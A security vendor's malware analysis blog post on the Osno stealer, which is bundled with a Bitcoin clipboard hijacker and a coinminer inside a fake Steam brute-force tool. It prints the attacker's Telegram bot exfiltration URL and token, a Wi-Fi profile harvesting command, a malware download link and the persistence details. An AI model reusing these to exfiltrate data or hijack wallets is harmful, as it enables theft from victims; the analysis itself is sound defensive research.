# Osno – A Stealer and a Miner in One **labs.k7computing.com/** By K7 Labs January 28, 2021 In the earlier days, threat actors used to create malware for a specific job. For instance, ransomware. However, these days threat actors have started creating malware which are versatile. Here, in this blog we will be explaining about one such malware, Osno, which is both a Stealer and a Miner. Osno Recovery Tool/Stealer steals browser data, wallet details, captures screenshot of system and grabs details of installed programs. Earlier this year, Osno stealer when downloaded installed both a rootkit and its ransomware on the victim’s system. Here, we will be getting into the nuances of an archive file “Steam_Machine_Checker.rar” which can be downloaded from the site hxxps[:]//www[.]upload[.]ee/files/12701875/Steam_Machine_Checker[.]rar[.]html and comes bundled with Osno stealer, BTC Clipboard Hijacker along with a Coinminer. ----- _Figure 1:_ _Malware Download_ Steam is a digital store for purchasing, downloading and playing video games. “Steam Machine Brute Force Checker” is a hacktool for brute forcing passwords for Steam Engine. The author tries to lure illegal game users into downloading this tool bundled with malware. After execution of the Steam_Machine_Checker.exe, it opens the GUI screen of “Steam Machine Brute Force checker” in the frontend and starts its malicious activity in the backend. ----- _Figure 2: SteamBruteForce&Checker GUI_ _Figure 3:_ _Process Flow_ _SteamMachine.exe executes service.exe and then SteamMachineService.exe which are not malicious by_ themselves. ----- _Figure 4: Files found in_ _SteamMachine/config Folder_ **Persistence** Update.exe creates Run entry for persistence in the “HKCU\Software\Microsoft\Windows\CurrentVersion\Run” registry location and points to the file in “%AppData%\Roaming\scvhost\scvhostservice.exe“. Scvhostservice.exe initiates svchost.exe which in turn does coin mining. _Figure 5: Autostart Entry for Malware_ **Clipboard Hijacker** Ctfmom.exe and _CL_02f3a8c9sy is dropped in “%Appdata%/Roaming/Microsoft” by config.exe. _CL_02f3a8c9sy has base64 encoded data. _Figure 6: ctfmom.exe – Clipboard_ _Hijacker_ [It gets the current Clipboard using Clipboard.GetText( ). If the hash in currentClipboard starts with ‘1’ it](https://docs.microsoft.com/en-us/dotnet/api/system.windows.forms.clipboard.gettext?view=net-5.0) [replaces it with 1LrPUuoopchKbfkJYLEwk2YWqBh6ZakTxX using Clipboard.SetText( ).](https://docs.microsoft.com/en-us/dotnet/api/system.windows.forms.clipboard.settext?view=net-5.0) **Clipboard.GetText – Retrieves text data from the Clipboard.** **Clipboard.SetText – Clears the Clipboard and then adds text data to it.** A common user may not notice any change while pasting for a BTC transaction. Hackers will succeed in getting bitcoins using such transactions (wrong transaction for the user). ----- _Figure 7: Code containing Clipboard Hijacker_ _Figure 8: Code containing_ _Malware Author’s BTC Address_ This transaction ID has been actively receiving Bitcoins by abusing clipboard. Some users have reported the replacement of their hash with the malware author’s hash in the same site. _Figure 9: Bitcoin Transaction for_ _1LrPUuoopchKbfkJYLEwk2YWqBh6ZakTxX_ **Osno Stealer** Configs.exe starts MsBuild.exe for stealer activity. MSBuild.exe steals bookmarks (for finding victim’s preferred site which could be internet banking or bitcoin transaction site), wallets, list of running process (using tasklist.exe), hardware and software installed – Anti-Virus, firewall etc., which is kept in the temp folder with MD5 (username)/MD5 (machinename). ``` ‘"cmd.exe" /C chcp 65001 && netsh wlan show profile | findstr All’ ``` is used for viewing Wireless AutoConfig Service profile and converting to UTF-8 format and the list of Bitcoin wallet searched: Zcash, Armory, Bytecoin, Ethereum, Exodus, Electrum, Coinomi, Guarda, Atomic, Litecoin, Dash, Bitcoin. It also downloads CommandCam.exe from [hxxp[:]//raw[.]githubusercontent[.]com/tedburke/CommandCam/master/CommandCam[.]exe](http://raw.githubusercontent.com/tedburke/CommandCam/master/CommandCam.exe) for capturing screenshots of the system. The screenshot is saved as screen.jpg ----- _Figure 10: Stealer_ _Data in Temp Folder_ Signature.txt, created by MSBuild.exe, is found in temp directory has the string “Osno Recovery Tool version 2.1.5” _Figure 11: Contents in Signature.txt_ Hardware & Soft.txt created by MSBuild.exe also has the string “OsnoStealer WifiFucker v2” and other details like Firewall, Anti-Virus, Timezone, Country, and HWID. _Figure 12:_ _Contents in Hardware & Soft.txt_ MSBuild.exe also gets a list of all the stored files present in each directory. It is then stored in the subfolder ‘Dirs’ as Desktop.txt, Documents.txt, Downloads.txt, OneDrive.txt, Pictures.txt, Startup.txt, Temp.txt and Videos.txt. _Figure 13:_ _Stealer data in Directory Structure_ [It then sends the stolen data in temp via telegram using ‘sendDocument’ of Telegram Bot API. This method](https://core.telegram.org/bots/api) is used to send general files. ----- **sendDocument** sendDocument (chat_id, document) Use this method to send general files. On success, the sent message is returned. Bots can currently send files of any type of up to 50 MB in size, this limit may be changed in the future. **Parameter** **Type** **Required** **Description** chat_id Integer or String document InputFile or String Yes Unique identifier for the target chat or username of the target channel (in the format @channelusername) Yes File to send. Pass a file_id as String to send a file that exists on the Telegram servers (recommended), pass an HTTP URL as a String for Telegram to get a file from the Internet, or upload a new one using multipart/form-data. More info on Sending Files **Botid: 1357457986:AAERrY18oy4DDObaDW6NeWL5QjSOphXAuyA** **Chat_id: 1171937559** hxxp[:]//api[.]telegram[.]org/bot1357457986:AAERrY18oy4DDObaDW6NeWL5QjSOphXAuyA/sendDocument? chat_id=1171937559&caption=☠ **Brought you by Osno 2.1.5** ☠ _Figure 14: Malicious Network Activity Captured_ Malware process path is stored as base64 encoded in %Temp%/gpustats.bx path. _Figure 15: gpustats.bx found in temp_ **Coinminer** Along with the stealer and BTC Clipboard Hijacking, it also does coin mining. The files seen in Figure 16 are dropped by update.exe which is responsible for coin mining. ----- _Figure 16: Coinminer_ _dropped in Roaming\scvhost_ [Coinminer programs namely DiabloMiner, found in the Cursor Library files are from open source code.](https://github.com/Diablo-D3/DiabloMiner) [Other Cursor Libraries are derived from poclbm project.](https://github.com/Eropi4/cgminer_keccak) **Control Logic** **Open Source Code** **Author** diablo130302.cl DiabloMiner Con Kolivas, Patrick McFarland diakgcn121016.cl poclbm project phatk kernel Phateus DiabloMiner kernel DiabloD3 phatk121016.cl poclbm project Con Kolivas poclbm130302.cl poclbm project Con Kolivas scrypt130511.cl Con Kolivas Svchost.exe dropped in AppData\Roaming\scvhost does coinminer activity. Svchost.exe is a legitimate coinmining file given malicious parameters by the threat actors to do their illegal work. _Figure_ _17: Fake svchost.exe contacting litecoinpool_ ----- Litecoin, as shown in Figure 17, is a purportedly technical improvement of Bitcoin that is capable of faster turnarounds via its Scrypt mining algorithm (Bitcoin uses SHA-256). The Litecoin Network is able to produce 84 million Litecoins—four times as many cryptocurrency units issued by Bitcoin. mining.subscribe(“user agent/version”, “extranonce1”) mining.authorize(“username”, “password”) _Figure 18: Coinmining_ _Packet_ Osno stealer not only keeps evolving its techniques and code to stay undetected but also comes bundled with coinminer and BTC Clipboard Hijacker for malware author’s direct monetary benefit. Users are advised not to download and install hacking tool software from untrusted sites, which might actually be a trap laid out for them. It is also recommended to double check the hash while doing a BTC transaction. We at K7 detect all such malicious files. Users are advised to install a reputable security product like “K7 Total **Security” and keep it updated to stay safe from the latest threats.** ## Indicators Of Compromise (IOCs) **MD5** **File Name** **K7 Detection Name** 12CB317972BD329289FBC8B7CD289E67 configs.exe Trojan ( 005756931 ) 29516F4747ABB49E2085B64376A89F2E update.exe Trojan ( 005756931 ) 998D4888B99734C60802F93FB2DAF940 ctfmom.exe Trojan ( 00558e791 ) 29516F4747ABB49E2085B64376A89F2E scvhostservice.exe Trojan ( 005756931 ) -----